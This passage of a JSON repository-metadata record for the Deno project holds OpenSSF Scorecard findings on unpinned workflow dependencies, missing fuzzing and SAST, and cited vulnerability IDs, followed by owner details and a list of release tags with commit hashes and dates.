third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/re